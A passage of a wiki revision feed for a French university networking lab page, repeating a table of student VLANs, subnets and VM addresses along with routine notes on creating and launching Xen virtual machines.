| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;quot;orelsan.cfg&amp;quot; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35622</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35622"/>
				<updated>2016-12-05T14:47:01Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;quot;orelsan.cfg&amp;quot; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt;kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
extra       = 'elevator=noop'&lt;br /&gt;
ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35621</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35621"/>
				<updated>2016-12-05T14:46:48Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;quot;orelsan.cfg&amp;quot; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
extra       = 'elevator=noop'&lt;br /&gt;
ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35620</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35620"/>
				<updated>2016-12-05T14:43:11Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35583</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35583"/>
				<updated>2016-12-02T09:06:22Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35581</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35581"/>
				<updated>2016-12-02T09:01:07Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|+ Tableau&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35580</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35580"/>
				<updated>2016-12-02T09:00:11Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : Page créée avec «  {| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot; |+ Tableau |- ! scope=col | N° VLAN ! scope=col | Prénom ! scope=col | Réseau local ! scope=col | @IP réel routeur ! scope=col |... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|+ Tableau&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | @IP réel routeur&lt;br /&gt;
! scope=col | @IP virtuelle routeur&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| 10.60.20.2/24&lt;br /&gt;
| 10.60.20.3/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| 10.60.21.2/24&lt;br /&gt;
| 10.60.21.3/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| 10.60.22.2/24&lt;br /&gt;
| 10.60.22.3/24 &lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| 10.60.23.2/24&lt;br /&gt;
| 10.60.23.3/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| 10.60.24.2/24&lt;br /&gt;
| 10.60.24.3/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| 10.60.25.2/24&lt;br /&gt;
| 10.60.25.3/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	</feed>